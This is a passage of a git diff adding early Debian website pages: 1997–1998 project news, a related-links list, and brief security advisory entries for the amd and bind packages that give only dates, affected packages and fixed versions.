dorm +or if you really want to spread the Linux gospel, your whole city!!! +For example, we will ship up to 12 CDs for $5.00 S/H in the U.S. and Canada. +</blockquote> + + +<HR> +<H2><A NAME="19980125a">25 Jan 1998: Debian Talks near You</A></H2> +<P>This year there will be Debian talks at Linux Expo North Carolina, +<A HREF="http://www.linuxexpo.org/">http://www.linuxexpo.org/</A>, May 28-30, +and Debian talks and a table +at the Atlanta Linux Showcase, +<A HREF="http://www.ale.org/showcase/">http://www.ale.org/showcase/</A>, October +23-24. In addition, we've submitted programs and hope to be accepted +at the International Linux Kongress, Cologne Germany, June 3-5 [URLs no longer valid], +and the SANE conference in +Maastricht, November 18-20, +<A HREF="http://www.nluug.nl/events/sane98">http://www.nluug.nl/events/sane98</A>. +Ian Jackson hopes to appear at the Linux Kongress, Bruce Perens will be at +all shows where we're accepted. + +<P>We'll inform you as more talks are added. + +<HR> +<H2><A NAME="19980125b">25 Jan 1998: Debian Stability</A></H2> +<P>Debian's "master" system is a Pentium 90 with 64MB graciously provided +by one of our donors, Novare, who also donate its site in Texas, its support, +and its internet connection. It delivers over 100,000 e-mails daily, +runs the CVS server for the GNOME project, is our master FTP server +with many mirror systems accessing it every day, hosts our bug reporting +system and many project utilities, and is the "home" system of our 200 +developers, who compile, upload, and download using that system every day. +This is a heavier load than people put on a single commercial workstation +running anything but Linux. A Microsoft NT system with a Pentium Pro and +128MB RAM would not approach the load this system handles effortlessly every +day. The system just ran continuously for three months without a reboot. + +<P>The following quote is from Bruce Perens (past president of Debian and +board member of SPI) who works at Pixar: +<blockquote>I thought three months without a reboot was a big deal. When I mentioned +it to our developers, one of them showed me details about his system. It +was up for 458 days, and was halted to move it to another floor. The network +and disk device drivers had handled tens of millions of interrupts in that +time.</blockquote> + +<HR> +<H2><A NAME="19980125c">25 Jan 1998: Debian Affiliates</A></H2> +<P>The Berlin project, a project to make a next-generation window system, +has chosen to become part of Software in the Public Interest (Debian's +corporation). The project's timeline is about two years long. + +<P>Debian is discussing collaboration with SEUL, a project to make a simple +end-user Linux for less-technical users than we presently support. See +their web page at +<A HREF="http://www.seul.org/">http://www.seul.org/</A>. + +<HR> +<H2><A NAME="19980104">4 Jan 1998: Debian and the Millennium Bug</A></H2> +<P>Since there seems to be widespread panic about the "millennium bug", +it seems appropriate to tell you about how your Debian +system might be affected. + +<P>Unix and Linux do not store 2-digit dates, although it is possible for +an application to do so. They store dates as a count of seconds since +New Year's Day 1970. This counter will overflow about 40 years from now, +in early 2038, _not_ 2000. + +<P>The few Debian applications that stored 2-digit dates have already been +repaired, and Debian systems have passed testing with their dates set +at 2000 and greater. There is one area in which Debian 1.3 is affected +but our upcoming 2.0 release will not be. Your PC's BIOS may only allow +you to set the PC's clock chip to a 2-digit date. This is a bug in your +PC's BIOS ROM, but we will provide a work-around in Debian so that you +don't have to buy a new motherboard. If you expect to run your 1.3 system +through the millennium, you can get a copy of the "hwclock" program from +2.0 and replace the "clock" program presently on your system. + +<P>Before 2038 we must define "time_t", to be a 64-bit variable instead of +a 32-bit one, and recompile all programs. This is a very simple process +compared to the anguish the non-Unix world is going through - we go +through more work to produce a major release of Debian. Once time_t is +a 64 bit variable, it's good for roughly another 292271023017 years. By then, +there may be something better than Debian :-) + +<HR> +<H2><A NAME="19980101">1 Jan 1998: Happy New Year from the Debian Project</A></H2> +<P>1998 brings some changes for the Debian project. Ian Jackson is now +Debian project leader. Bruce Perens will continue as president of Software in the +Public Interest, Inc., and will work on such things as funding worthy +free software projects, external communications for the Debian project, +Open Hardware, and another SPI software project that might eventually be +as big as Debian. + + +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", ".", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/news1997.wml b/english/news1997.wml new file mode 100644 index 00000000000..1fed63a303f --- /dev/null +++ b/english/news1997.wml @@ -0,0 +1,486 @@ +#!wml -o ../../debian.org/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — News in 1997" + +<H1>Debian News in 1997</H1> + +<HR> + +<UL> +<LI><A HREF="#19971211">Debian Available Pre-installed on New Computers</A> + <SMALL>(11 Dec 1997)</SMALL> +<LI><A href="#19971130">Debian Announces $1000 Grant to Gnome Project</A> + <SMALL>(30 Nov 1997)</SMALL> +<LI><A href="#19971125">Become a Debian Developer! Debian Mentors are waiting to help you</A> + <SMALL>(25 Nov 1997)</SMALL> +<LI><A href="#19971115">Linux Distributions and The Free Software Community</A> + <SMALL>(15 Nov 1997)</SMALL> +<LI><A href="#19971022">Debian Included on CD in Magazine</A> + <SMALL>(22 Oct 1997)</SMALL> +<LI><A href="#19971020">First Book on Debian Published</A> + <SMALL>(20 Oct 1997)</SMALL> +<LI><A href="#19971010">Unix-on-Intel players work on a common binary format</A> + <SMALL>(10 Oct 1997)</SMALL> +<LI><A href="#19970818a">Over 2200 Debian Official 2-CD Sets Sold in 8 Weeks</A> + <SMALL>(18 Aug 1997)</SMALL> +<LI><A href="#19970818b">Companies Donate Hardware and Net Connections to Debian</A> + <SMALL>(18 Aug 1997)</SMALL> +<LI><A href="#19970710">Debian Converting to "GNU LIBC 6"</A> + <SMALL>(10 Jul 1997)</SMALL> +<LI><A href="#19970708">Debian 1.3.1 Released</A> + <SMALL>(08 Jul 1997)</SMALL> +<LI><A href="#19970708b">Debian in Orbit on Space Shuttle</A> + <SMALL>(08 Jul 1997)</SMALL> +<LI><A href="#19970627">Congress Concerning Debian GNU/Linux this fall</A> + <SMALL>(27 Jun 1997)</SMALL> +<LI><A href="#19970626a">Debian's Second Shuttle Flight</A> + <SMALL>(26 Jun 1997)</SMALL> +<LI><A href="#19970609">"Software in the Public Interest" Is now incorporated</A> + <SMALL>(09 Jun 1997)</SMALL> +<LI><A href="#19970602">Debian 1.3 Released</A> + <SMALL>(02 Jun 1997)</SMALL> +<LI><A href="#19970401">Debian Flies on the Space Shuttle</A> + <SMALL>(01 Apr 1997)</SMALL> +<LI><A href="#19970326">Search for Debian Logo Continues</A> + <SMALL>(26 Mar 1997)</SMALL> +<LI><A href="#19970317">Chairman and Secretary elected by the Board of Directors</A> + <SMALL>(17 Mar 1997)</SMALL> +<LI><A href="#19970307.1">Leadership Changes for the Debian Project</A> + <SMALL>(07 Mar 1997)</SMALL> +<LI><A href="#19970307.2">"Software in the Public Interest" is incorporating</A> + <SMALL>(07 Mar 1997)</SMALL> +<LI><A href="#19970301">Board of Directors elected</A> + <SMALL>(01 Mar 1997)</SMALL> +</UL> + +<HR> +<H2><A name="19971211">11 Dec 1997: Debian Available Pre-installed on New Computers</A></H2> + +<P>We're happy to announce a computer manufacturer that supports Debian. +<A href="http://www.varesearch.com/">VA Research</A> is offering Debian +pre-installed at no extra charge on all of the computer systems they sell: +laptops, workstations, and file servers. You can see the products at +<A href="http://www.varesearch.com/">http://www.varesearch.com/</A>. +VA has donated a system and a high-bandwidth network connection to Debian. +Here's some information on a system on sale this month that includes a +Debian donation. + +<BLOCKQUOTE> +<P>We have a new system. It's a VArStation 25 - a dual capable Pentium II +system, available with either one or two 233, 266, or 300Mhz cpus. It's an +ide based system, and we're pricing the whole thing starting at $2200 +including a Matrox card, 64 megabytes of ram, and a SoundBlaster. + +<P>There are a few upgrades...bigger disk, more ram, better graphics, etc. +It's a good system because people can start with a single processor and +some ram, and add a second processor and double their ram later. + +<P>In order to help Debian, we are going to donate 2% of the price of any +VArStation 25 system ordered in December with Debian pre-installed. + +<P>Its web page is +<A href="http://www.varesearch.com/products/vs25.html">http://www.varesearch.com +/products/vs25.html</A> +</BLOCKQUOTE> + +<HR> +<H2><A name="19971130">30 Nov 1997: Debian Announces $1000 Grant to Gnome Project</A></H2> + +<P>The Debian GNU/Linux Distribution is getting enough donations now that we +can support the development of free software. We use most donations for our +own work, but some outside projects are worth funding. + +<P>Debian is awarding $1000 to the GNOME project (see +<A href="http://www.gnome.org">http://www.gnome.org</A>). They +are building a GUI desktop for Linux and Unix systems. In addition, we +have granted GNOME use of Debian's servers so that they need not spend +any of the $1000 on internet services. We chose the GNOME project +because: + +<OL> +<LI>They are using 100% free software. +<LI>They have an excellent design and have shown rapid progress. +<LI>They are doing the right thing, and that should be rewarded. +</OL> + +<P>This won't be the last Debian grant. To qualify for support, all of the +software used by a project must conform to +<A href="social_contract#guidelines">Debian's +Free Software Guidelines</A>. +These assure that the software is free for use by _anyone_, not just Debian. + +<P>If you're not familiar with Debian GNU/Linux, check out our web site at +<A href="http://www.debian.org/">http://www.debian.org/</A>. + +<HR> +<H2><A name="19971125">25 Nov 1997: Become a Debian Developer! Debian Mentors are waiting to help you</A></H2> + +<P>Do you want to see your software fly on the Space Shuttle? Want to see it +used in classrooms and companies everywhere? Want to give something back +for all of the great free software that others have contributed? Want to +be part of the best project in the free software world, with lots of smart +people to work with? + +<P><STRONG>*** BECOME A DEBIAN DEVELOPER ***</STRONG> + +<P>Be a technical writer, a package maintainer, or a programmer. + +<P>Now, it's easier than ever to become a Debian developer, because we've +set up "mentors" - experienced Debian staff who will guide you +through the process. You can meet them on the Debian Mentors mailing +list. To subscribe, send a message to +debian-mentors-REQUEST@lists.debian.org with the word "subscribe" in +the body. + +<P>About the easiest way to become a developer is to adopt a software +package. You can find a list of software packages that need maintainers at +<A href="doc/prospective-packages.html">http://www.debian.org/doc/prospective-packages.html</A>. + +<P>You can find more information in our +"<A href="developers_corner">Developer's Corner</A>". +Documents here include the Debian Policy Manual and the Debian Packaging +Manual, key references for every Debian package maintainer. + +<HR> + +<H2><A name="19971115">15 Nov 1997: Linux Distributions and The Free +Software Community — a note from the president of Debian</A></H2> + +<P>We of the Debian project produce a high-quality 100% free-software Linux +system. But, as volunteers, we have another job, too - Debian helps keep +the commercial Linux distributors "honest" by providing a non-commercial +alternative for them to be compared against. + +<P>There is a "Social Contract" in the free software community. Good members +take value from it in the form of free software that others have +contributed, and _return_ value for what they have taken in the form of +free software that they have developed. Bad members just take. + +<P>Is your Linux Distribution honoring the social contract? You can find +Debian's policy at +<A href="social_contract">http://www.debian.org/social_contract</A>. +This provides a statement of what we will give back to the free software +community, and our guidelines for what is free software and what's not +quite free. We published this about half a year ago, expecting other +Linux distributions to also state in writing how they were going to +treat the free software community. So far, no other Linux distribution +has made that statement. + +<P>If you run a Linux system other than Debian, we urge you to ask them +for a copy of their "Social Contract" in writing. We'd like you to be +able to compare all Linux systems on the basis of how they are treating +the free software community. + +<PRE> + Thanks + + Bruce Perens + Debian Project Leader +</PRE> + +<HR> +<H2><A name="19971022">22 Oct 1997: Debian Included on CD in Magazine</A></H2> + +<P>The November issue of Boot Magazine includes a 240MB subset of Debian 1.3.1 +on CD. Once your system is installed, you can use dselect's FTP mode to +upgrade to the full system. The issue is priced at $7.99 U.S. and $8.99 +Canada. There's also a feature on alternative operating systems, including +Linux, that goes into the fundamentals of free software. +You should be able to find Boot wherever computer magazines are sold. + +<HR> +<H2><A name="19971020">20 Oct 1997: First Book on Debian Published</A></H2> + +<P>Linux Press has announced the publication of <EM>The Debian Linux +User's Guide</EM>. +This 250 page book comes with the 2 CD-ROM Debian "Official" GNU/Linux 1.3.1, +a third CD-ROM with a customized version of Debian 1.3.1, and +30 Days of E-mail Technical Support. +<P>For those in the US, it should be available in Borders' bookstores. +It can also be ordered directly from the publisher or can be found +at a good computer store that carries Linux CDs. +Of course you will want to run out and buy a copy, but Linux Press +is offering an +<A href="http://www.linuxpress.com/">HTML version of the book</A> at +their web site. + +<P>For more information, see the +<A href="News/linux_press_book.txt">press release</A> or visit +<A href="http://www.linuxpress.com/">Linux Press' homepage</A>. + +<HR> +<H2><A name="19971010">10 Oct 1997: Unix-on-Intel players work on a common binary format</A></H2> + +<P>Dear Debian users and developers, + +<P>Here's an announcement from the 86open project, a project to make +binary compatibility across all Unix variants on Intel architectures. +In short, it's an effort to support ELF LIBC6 executables on all of the +platforms, so that vendors can build a single application that runs on +all Intel Unix variants. As you can see from the announcement, this +project already has a substantial amount of commercial support. + +<P>I think this has much more of a chance to succeed where previous Unix +standardization efforts have fallen short. Rather than produce a paper +standard, the project will release a reference implementation that runs +on the various platforms. Because this will be free software, the cost +of implementing compatibility will be much lower than that of +implementing new software to run a paper standard. + +<P>The fact that commercial Unix vendors are turning to free software for +this solution is a real triumph for the free software movement, and one +I expect to see repeated. I'm happy to see the major Linux distributions +represented on the steering committee along with the largest commercial +Unix vendors, and I'm proud to represent Debian on this project. + +<PRE> + Thanks + + Bruce Perens +</PRE> + +<P><A href="News/common_library">For the full text of the announcement click +here</A> + +<HR> +<H2><A name="19970818a">18 Aug 1997: Over 2200 Debian Official 2-CD Sets Sold in 8 Weeks</A></H2> + +<P>Since the start of the Debian Official CD program, just 8 weeks ago, +over 2200 2-CD sets have been sold. The number may well be higher, as +companies are not required to tell us about their sales. About half of +the reported sales are mail-order. Approximately US$3000 in donations +have been made so far by CD purchasers, and the checks have started to +come in from the CD vendors. A list of CD vendors can be found on our +web site, +<A href="http://www.debian.org/">http://www.debian.org/</A>. Anyone can duplicate and sell the +Debian 1.3.1 Official 2-CD Set. For information, see +<A href="ftp://ftp.debian.org/OfficialCD/1.3.1">ftp://ftp.debian.org/OfficialCD/1.3.1</A>. + +<HR> +<H2><A name="19970818b">18 Aug 1997: Companies Donate Hardware and Net Connections to Debian</A></H2> + +<P>Following our solicitation for hosting services, two companies have +committed to donate systems and high-bandwidth net connections to the +Debian Development. Information on the donors will appear on the Debian +web site once the systems are "on the air". Several other sites offered +to donate space on an existing system, a net connection, or mail +delivery services. All of Debian's internet services are donated to the +project, including its web sites on various continents and its 75 FTP +mirror sites. + +<HR> +<H2><A name="19970710">10 Jul 1997: Debian Converting to "GNU LIBC 6"</A></H2> + +<P>The Debian group is busy building Debian 2.0, its first distribution +based on GNU LIBC 6 for all platforms, including the i386. LIBC 6 +re-unites the Linux C library with the GNU C library used on other +platforms, and improves compatibility of Linux with POSIX standards. +The Debian 2.0 developmental snapshot is at +<A href="ftp://ftp.debian.org/debian/hamm/hamm">ftp://ftp.debian.org/debian/hamm/hamm</A>, +this is not yet a working system. +If you would like to help with this development, please read the +developer's manuals at +<A href="http://www.debian.org/doc/">http://www.debian.org/doc/</A>. + +<P>Debian 2.0 will continue to support the LIBC 5 applications that currently +run under Debian 1.3 and other Linux distributions. + +<HR> +<H2><A name="19970708">8 Jul 1997: Debian 1.3.1 Released</A></H2> + +<P>Debian GNU/Linux 1.3.1 is now available on our 79 FTP sites. In +addition, our Official 2-CD Set is available for you to duplicate +and sell (or give away) with no fee from us. + +<P>The main difference from 1.3 to 1.3.1 is the inclusion of XFree86 3.3 . +This solves a number of known security bugs and other problems in X. +There are also bug-fixes to several other packages. + +<P>You can find the Official Debian GNU/Linux 1.3.1 2-CD Set for sale at +excellent prices. Please see +<A href="http://www.debian.org/distrib/vendors">http://www.debian.org/distrib/vendors</A> +for a listing of CD vendors. + +<P>If you already have a 1.3 CD, you may find it most economical to update +your system to 1.3.1 automatically from one of our 79 FTP mirror sites. +You can do this using Dselect's FTP installation method. +You can also download and install Debian for the first time using FTP. +A listing of mirror sites can be found +<A href="misc/README.mirrors">here</A>. + +<P>If you would like to duplicate and sell the Official Debian 1.3.1 2-CD Set, +you can download the ISO 9660 image files from one of several +<A href="misc/CD.mirrors.txt">official CD mirror sites</A>. +In addition, CD manufacturers _only_ can order two gold CD masters, ready to +duplicate, sent via air express for $50. +To order, send mail to <A href="mailto:bruce@debian.org">bruce@debian.org</A>. + +<HR> +<H2><A name="19970708b">8 Jul 1997: Debian in Orbit on Space Shuttle</A></H2> + +<P>As of this writing, a Debian system is currently in orbit on the U.S. Space Shuttle. It is +monitoring an experiment in the Microgravity Science lab. Full details +are available in the July 1997 edition of "Linux Journal". + +<HR> +<H2><A name="19970627">27 Jun 1997: Congress concerning Debian GNU/Linux this fall</A></H2> + +<P>The German association <a href="http://www.individual.net/">Individual Network e.V.</a> +is very pleased to present a networking congress this fall which deals +with Linux. Bruce Perens, Debian Project Leader, will talk about +Debian GNU/Linux while Richard Stallman speaks about ethico-political +issues of free software. There will be some more Debian related +events. + +<P>The congress will take place on 27th and 28th of September in +<A href="http://www.aachen.de/">Aachen</a>, Germany. Please refer to the +web page at +[address no longer valid] +for more information and registration.<BR> +Note: Although some of the sites referenced are in German, the congress will be in +English. + +<HR> +<H2><A name="19970626a">26 Jun 1997: Debian's Second Shuttle Flight</A></H2> + +<P>The space shuttle mission that is being launched on July 1 will carry a +Debian GNU/Linux system. This is Debian's second space flight, a repeat +of an earlier mission that returned to earth early due to fuel-cell +problems on the shuttle. The Debian system will monitor a plant growth +experiment in the Microgravity Science Lab, will perform some simple +process control, and will send video and telemetry to the ground. + +<HR> +<H2><A name="19970609">9 Jun 1997: "Software in the Public Interest" Is now incorporated</A></H2> + +<P>Software in the Public Interest, Debian's parent organization, is now a +non-profit corporation under the laws of New York State. Many thanks are +due to Tim Sailer, our Treasurer, and Frank Marotta, our attorney, for +their work on incorporation. + +<P>Tim and Frank will now petition the United States Internal Revenue Service +to grant us 501(c)3 tax-exempt non-profit status. When completed, this will +allow donations to Debian to be deductible for those who file U.S. federal +tax returns. We expect to expend $1500 to $2000 in legal fees on this +process, which is more than we currently have in our treasury. Please see +our Donations web page at +<A href="http://www.debian.org/donations">http://www.debian.org/donations</A>. If you +have questions about Debian's finances, please direct them to Tim at +<A href="mailto:tps@buoy.com">tps@buoy.com</A>. + +<HR> +<H2><A name="19970602">2 Jun 1997: Debian 1.3 Released</A></H2> + +<P>The much awaited release of Debian GNU/Linux version 1.3 is here. +Debian is making great strides in easing the installation of Linux. And, +of course, upgrading an existing Debian system is a snap. Two notable new +features are floppy-less install from CD and a new testing group resulting in +even fewer problems when running a Debian system. +For full details and installation instructions, see our official +<A href="News/1.3">Announcement</A>. + +<HR> +<H2><A name="19970401">1 Apr 1997: Debian Flies on the Space Shuttle</A></H2> + +<P>Debian was chosen to control an experiment on the Space Shuttle which +flew in March. As the mission was ended early do to a problem with the +fuel-cells, the experiment will probably fly again on a mission later this +year. The full text of the press release can be seen +<A href="News/shuttle1">here</A>. + +<HR> +<H2><A name="19970326">26 Mar 1997: Search for Debian Logo Continues</A></H2> + +<P>Debian is looking for a logo. If you would like to see the current +choices or to contribute, take a look at +<A href="http://fatman.mathematik.tu-muenchen.de/~schwarz/debian-logo/">the +Debian logo page</A>. + +<HR> +<H2><A name="19970317">17 Mar 1997: Chairman and Secretary Elected by the Board of Directors</A></H2> + +<P>Ian Murdock, the founder of Debian, has been elected as chairman of the +Board of Directors. Additionally, Dan Quinlan, Senior VP and Board +member, has been elected to serve as Secretary of the Board. + +<HR> +<H2><A name="19970307.1">07 Mar 1997: Leadership Changes for the Debian Project</A></H2> + +<UL> +<LI>Daniel Quinlan becomes our Senior Vice President. He takes on all + day-to-day administrative responsibility for the project.<BR> + The Senior VP can be reached at <EM>senior_vp@debian.org</EM>. + +<LI>Brian C. White becomes Vice President of Engineering. He takes on + the engineering leadership for the distribution.<BR> + The VP of Engineering can be reached at <EM>vp_engineering@debian.org</EM>. +</UL> + +<P>Both positions report to the President, currently Bruce Perens, who +reports to the Board of Directors. The President can be reached at +<EM>president@debian.org</EM>. + +<HR> +<H2><A name="19970307.2">07 Mar 1997: "Software in the Public Interest" is incorporating</A></H2> + +<P>Debian's non-profit organization, "Software in the Public Interest", is +incorporating. That will give us a way to protect our developers from +lawsuits, and a way for Debian to accept grants and donations, etc. +Incorporation costs money to do. We also have other legal expenses in +filing for trademarks, etc. And we'd like to be able to send +representatives to major trade shows, and perhaps to operate a trade +show booth showing off Debian. There are also petty cash expenses like +postage and copying for press releases, net domain fees, post office +box fees, etc. + +<P>We are soliciting donations of any amount. The first thing we'll do with +the money is complete our incorporation and get a bank account for the +corporation. Our attorney is operating an escrow fund for us so that we +can take donations during our incorporation. Donations are _not_ +tax-deductible at this time. + +<P>Please make checks (no cash, please) out to: + +<PRE> + Software in the Public Interest, Frank J. Marotta as attorney + (abbreviating that to SPI is fine) +</PRE> + +<P>Please send them to: +<PRE> + Software in the Public Interest + PO Box 671 + Ridge, NY 11961 +</PRE> + +<P>This post office box is being operated by our Treasurer, Tim Sailer, +<EM>treasurer@debian.org</EM>, who is also the project's liaison +with our attorney. Tim will be able to report on the status and +disposition of your donations. + +<HR> +<H2><A name="19970301">01 Feb 1997: Board of Directors elected</A></H2> + +<P>The Debian developers have elected a <EM>Board of Directors</EM> to guide +the further development of Debian GNU/Linux and to support the former +Project Leader and now President, Bruce Perens. + +<P>Elected are: +<UL> +<LI>Ian Jackson (2yr term) +<LI>Dale Scheetz (2yr term) +<LI>Daniel Quinlan (2yr term) +<LI>Sven Rudolph (2yr term) +<LI>Brian White (1yr term) +<LI>Bruce Perens (1yr term) +<LI>Christoph Lameter (1yr term) +<LI>Ian Murdock (1yr term) +</UL> + +<P>The first task for the BoD will be to draft a charter for the Debian +Project. + +<HR> + +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", ".", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/related_links.wml b/english/related_links.wml new file mode 100644 index 00000000000..42087b61e0d --- /dev/null +++ b/english/related_links.wml @@ -0,0 +1,195 @@ +#!wml -o ../../debian.org/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — Related Links" + +<H1>Related Links</H1> + +<P>The following is a list of information on the net that may be of interest +to Debian users. + +<HR> + +<H2>Software that is <A href="social_contract#guidelines">DFSG</A> Compliant</H2> + +<DL> +<DT><A href="http://www.linux.org/">Linux</A> +<DD>The kernel behind Debian. + +<DT><A href="http://www.gnu.org/">GNU</A> +<DD>Most of the utility programs on Debian are from GNU. + +<DT>X Window System +<DD><A href="http://www.xfree86.org/">XFree86, Inc.</A> maintains a very + good implementation of the + <A href="http://www.opengroup.org/tech/desktop/x">X Window System</A> + for several Unix variants. + +<DT><A href="http://www.gnome.org/">GNU Network Object Model Environment (GNOME)</A> +<DD>GNOME intends to build a complete, user-friendly desktop based entirely + on free software. + +<DT><A href="http://www.apache.org/">Apache</A> +<DD>The most widely used web server in the entire world. + +<DT><A href="http://www.perl.org/">Perl</A> +<DD>Formally, the Practical Extraction and Report Language, Perl is a widely + used scripting language. +</DL> + + +<HR> + +<H2><A href="http://www.linux.org/help/howto.html">Linux HOWTO's</A></H2> + +<P>As there are so many configurations possible for the setup and +maintenance of a Linux systems, knowledgeable people have provided +comprehensive instructions on how to do many specific tasks. For good reason +they are called HOWTOs. If you need your Debian system to do something that +isn't covered by the normal Debian setup, this is a good resource to check. + +<P>The HOWTO's are actually part of the Linux Documentation Project. They +are also available for installation on your machine in the doc-linux-text +package. + + +<HR> + +<H2><A href="http://sunsite.unc.edu/LDP/">Linux Documentation Project</A></H2> + +<P><EM>(Please note: The following description of the LDP has been copied from + the Linux International web site: + <A href="http://www.li.org/Resources/documentation.html">http://www.li.org/Resources/documentation.html</A>)</EM> + +<P>Linux documentation is coordinated through the efforts of the +<STRONG><A href="http://sunsite.unc.edu/LDP/">Linux Documentation Project</A></STRONG>. +The overall goal of the LDP is to collaborate in taking care of all of +the issues of Linux documentation, ranging from online docs (man +pages, texinfo docs, and so on) to printed manuals covering topics +such as installing, using, and running Linux. The LDP is essentially a +loose team of volunteers with no real central organization; anyone who +is interested in helping is welcome to join in the effort. We feel +that working together and agreeing on the direction and scope of Linux +documentation is the best way to go, to reduce problems with +conflicting efforts—e.g. two people writing two books on the same +aspect of Linux wastes someone's time along the way. + +<P>The LDP is set out to produce the canonical set of Linux online and +printed documentation. Because our docs will be freely available (as per +the GNU GPL) and distributed on the net, we are able to easily update the +documentation to stay on top of the many changes in the Linux world. + +<P>For more info on the <A href="http://sunsite.unc.edu/LDP/">Linux +Documentation Project</A>. + +<P>The LDP has so far produced a number of Linux documents and manuals: + +<UL> +<LI>The full set of Linux Documentation Project manuals is + <A href="ftp://tsx-11.mit.edu/pub/linux/docs/LDP">available</A>. +<LI>Here is the <A href="http://www.li.org/Resources/LDP/gs/gs/gs.html">Linux + Installation and Getting Started</a>, version 2.2.2 by Matt Welsh. +<LI>Here is the + <A href="http://www.redhat.com:8080/HyperNews/get/khg.html">Linux + Kernel Hacker's Guide</A>, by Michael K. Johnson. +<LI>Here is the + <A href="http://www.li.org/Resources/LDP/guide/guide.html">Linux + User's Guide</A>, by Larry Greenfield. +<LI>Here is the + <A href="http://www.li.org/Resources/LDP/nag/index.html">Network + Administrator's Guide</A>, by Olaf Kirch +<LI>Here is the <A href="http://www.li.org/Resources/LDP/sag/index.html">System + Administrator's Guide</A>, by Lars Wirzenius. +</UL> + +<HR> + +<H2><A href="http://www.ssc.com/glue">Linux User Groups</A></H2> + +<P>The Groups of Linux User Groups Everywhere (GLUE) web site contains +information on all known Linux user groups around the globe. It also +contains information on how to form a new group and a list of benefits that +some commercial firms bestow on group members. This is a great resource for +those new to Linux as many groups do installation workshops. + + +<HR> + +<H2><A href="http://www.kernel.org/">The Linux Kernel Archives</A></H2> + +<P>This is a repository for source code and information on the Linux +kernel. + + +<HR> + +<H2>Newsgroups</H2> + +<P>There are a couple of Linux related newsgroups available. Even so they are +not Debian-specific, they can provide Debian users with a lot of information. + +<DL> +<DT><A href="news:comp.os.linux.advocacy">comp.os.linux.advocacy</A></DT> +<DD>This group is for discussions why Linux is better or worse than any + other operating system around.</DD> + +<DT><A href="news:comp.os.linux.announce">comp.os.linux.announce</A> + (moderated)</DT> +<DD>Announcements. A must-read newsgroup.</DD> + +<DT><A href="news:comp.os.linux.answers">comp.os.linux.answers</A> + (moderated)</DT> +<DD>Periodical postings (FAQs, HOWTOs). A good place to start!</DD> + +<DT><A href="news:comp.os.linux.development.apps">comp.os.linux.development.apps</A></DT> +<DD>Development of applications.</DD> + +<DT><A href="news:comp.os.linux.development.system">comp.os.linux.development.system</A></DT> +<DD>Development of system software (kernel, libraries and related utilities).</DD> + +<DT><A href="news:comp.os.linux.hardware">comp.os.linux.hardware</A></DT> +<DD>Hardware-related discussions</DD> + +<DT><A href="news:comp.os.linux.m68k">comp.os.linux.m68k</A></DT> +<DD>About the Linux running on the Motorola 680x0 processor.</DD> + +<DT><A href="news:comp.os.linux.misc">comp.os.linux.misc</A></DT> +<DD>Miscellaneous topics. A catch-all group.</DD> + +<DT><A href="news:comp.os.linux.networking">comp.os.linux.networking</A></DT> +<DD>Networking related topics.</DD> + +<DT><A href="news:comp.os.linux.setup">comp.os.linux.setup</A></DT> +<DD>Setup and Configuration of Linux systems</DD> + +<DT><A href="news:comp.os.linux.x">comp.os.linux.x</A></DT> +<DD>Using the X windows system on Linux computers</DD> +</DL> + + +<HR> + +<H2>General UNIX Information</H2> + +<UL> +<LI><A href="http://www.polaris.net/ugu/">Unix Guru Universe</A> +<LI><A href="http://www.usenix.org/">The Usenix Association</A> +</UL> + +<HR> + +<H2>Other Free Operating System Projects</H2> +<UL> +<LI><A href="http://www.freebsd.org/">FreeBSD</A> +<LI><A href="http://www.netbsd.org/">NetBSD</A> +<LI><A href="http://www.openbsd.org/">OpenBSD</A> +<!-- Doesn't work. Don't know if it even exists anymore -Jay + <LI><A href="http://www.cs.hut.fi/lites.html">Lites</A> a 4.4bsd server + on top of a <EM>Mach</EM> kernel. +--> +<LI><A href="http://www.gnu.ai.mit.edu/software/hurd/hurd.html">GNU Hurd</A> +</UL> + +<HR> + +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", ".", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/security/amd.html b/english/security/amd.html new file mode 100644 index 00000000000..81f54898564 --- /dev/null +++ b/english/security/amd.html @@ -0,0 +1,38 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>April, 7, 1997 +<DT>Affected packages: + <DD>amd +<DT>Brief description: + <DD>amd ignores nodev option +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>amd upl102-11 +<DT>Entered Distribution: + <DD>Debian 1.2.10, released Apr 16, has this package +<DT>For more information: + <DD><A HREF="info/amd-nodev.html">Linux-security</A> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/bind.html b/english/security/bind.html new file mode 100644 index 00000000000..5974d606aa9 --- /dev/null +++ b/english/security/bind.html @@ -0,0 +1,77 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: non-public - April 01, 1998; public - April 08, 1998 